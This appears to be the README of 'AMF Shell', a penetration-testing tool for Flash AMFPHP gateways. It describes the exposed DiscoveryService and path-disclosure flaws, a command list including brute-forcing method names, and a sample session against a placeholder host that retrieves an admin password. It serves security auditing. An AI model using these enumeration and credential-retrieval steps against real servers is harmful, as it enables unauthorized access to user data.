Introduction
Action Message Format (AMF) is a binary format used to serialize ActionScript
objects. It is used primarily to exchange data between an Adobe Flash
application and a remote service, usually over the internet.

Background
When I was auditing the security of a content management system based on Flash,
I quickly realized that the information that I could dig out by hand from the
binary communication wouldn't take me the whole way. Burp Suite Pro, which I was
using at the time has a neat feature that decodes the serialized communication on 
the fly. However, it doesn't provide an adequate way to manipulate. Therefore,
I started investigating into possibilities of making a tool that could in fact
communicate freely with the AMF gateway using its own protocol.

After some investigation, I found PyAMF, which is a Python implementation of the
AMF messaging protocol. The tool that I started making then turned into something 
that I'd like to call, a AMF Shell.

AMFPHP Vulnerabilities
There are a number of vulnerabilities that are standard with AMFPHP, which was
the gateway software that I've constructed AMFShell around. By default, there
is a so called "Service Browser" installed that allows you to to pretty much
the same as my AMF Shell. It's typically installed in a path such as:

http://www.victim.com/amfphp/browser

However, most administrators are aware of this vulnerability and have removed the
Flash page. What they usually haven't removed is the service files associated
with it. They are typically located at:

http://www.victim.com/amfphp/services/amfphp/DiscoveryServices.php

DiscoveryService.php is the AMF class that the Service Browser calls on to do
it's magic. This class can still be contacted using AMFShell for example. The
vulnerability resides in the fact that the DiscoveryService class has methods
that enumerates other local services and classes and returns them.

The other vulnerability in AMFPHP is that it discloses the local path in case
one is trying to use a non-existent class or method. What you'll get is something
like this, when trying to access a class called 'asdf':

The class {asdf} could not be found under the class path {/mnt/target03/350439/508174/www/web/content/amfphp/services/asdf.php}

Yes, I've also been investigating into the possibility of directory traversal
but have so far been unsuccessful. One of the reasons is that it converts
dots '.' into slashes and is not subjected to hex or any other encoding.

Available commands
brute
- Launches a brute force attack for method names to the selected class using
  common names.
call methodName(args,..)
- Call a method from the current class. Arguments
  may be single arguments or arrays:
call methodName(['array','of','stuff'])
call methodName(arg1,arg2,arg3)
describe
- Describes current class. Lists methods and arguments
describe_all
- Describes all classes, methods and their arguments and outputs to a file.
list
- Lists available classes
use service.className
- Change current class

Usage example
$ ./amfshell.py http://www.victim.com/amfphp/gateway.php
[+] AMFPHP exists and appears to be vulnerable to 'DiscoveryService'.
[*] To disable 'DiscoveryServices', remove /homepages/16/d264/htdocs/services/amfphp/DiscoveryService.php

Welcome to Action Message Formate Shell by George Hedfors. Type 'help' for command list.

(amfphp.DiscoveryService) list
amfphp.DiscoveryService
UserService
(amfphp.DiscoveryService) use UserService
(UserService) brute
This may seriously harm your environment, are you sure? (y/N): y
Testing 539 methods...
Missing argument 1 for UserService::addUser()
Missing argument 1 for UserService::getUser()
Missing argument 1 for UserService::updateUser()
(UserService) call getUser(admin)
{"username": "admin", "password": "admin123", "id": "1"}

What could possibly go wrong from here? :)

Known bugs
Some pages return HTML content instead of AMF when calling a method. This cannot
be parsed by PyAMF but can easily be viewed using a sniffing tool, such as
Wireshark.